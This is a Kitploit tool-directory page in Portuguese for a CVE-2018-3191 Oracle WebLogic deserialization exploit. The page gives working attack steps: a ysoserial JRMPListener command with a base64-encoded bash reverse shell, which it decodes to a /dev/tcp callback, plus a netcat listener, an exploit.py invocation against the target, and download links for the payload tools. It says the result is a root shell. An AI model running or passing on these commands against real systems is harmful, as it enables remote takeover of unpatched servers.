Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2018-3191 — CVE-2018-3191 shell reverso | Kitploit
Ferramentas/GitHubGitHub/libraggbond/cve-2018-3191
Geração de PayloadsExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHublibraggbond/cve-2018-3191

CVE-2018-3191

CVE-2018-3191 shell reverso

Ver Repositório
6329há 7 anosRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2018-3191

CVE-2018-3191 Reverse Shell IP local: 172.16.38.1 Weblogic: 172.16.38.174:7001

  1. Execução local java -cp ysoserial-master.jar ysoserial.exploit.JRMPListener 2222 CommonsCollections1 'bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMzguMS83Nzc3IDA+JjE=}|{base64,-d}|{bash,-i}'

Então execute nc -lvv 7777

(1) O comando bash acima, para evitar a interpretação de caracteres especiais durante a execução do Runtime.getRuntime().exec(), foi codificado em base64 e depois decodificado. O texto simples é: bash -i >& /dev/tcp/172.16.38.1/7777 0>&1 (2) Esta operação cria um JRMPListener local, que recebe as solicitações do Weblogic atacado e executa o comando bash reverse shell especificado. (3) O Nc escuta na porta 7777, aguardando a conexão reversa do bash do host Weblogic. 2. Execute python exploit.py 172.16.38.247 7001 weblogic-spring-jndi-10.3.6.0.jar 172.16.38.1 2222, explorando a vulnerabilidade para fazer o Weblogic acessar o serviço RMI remoto e executar o comando bash reverse shell.

  1. A porta escutada pelo nc recebe o bash reverse shell, com privilégios root.

Ferramentas necessárias para o ataque: ysoserial-master.jar // Ferramenta de exploração de desserialização https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar weblogic-spring-jndi-10.3.6.0.jar // Ferramenta de geração de payload CVE-2018-3191 https://github.com/voidfyoo/CVE-2018-3191/releases exploit.py // Ferramenta de envio do protocolo T3 do Weblogic, integrando o payload CVE-2018-3191

Baixar ferramenta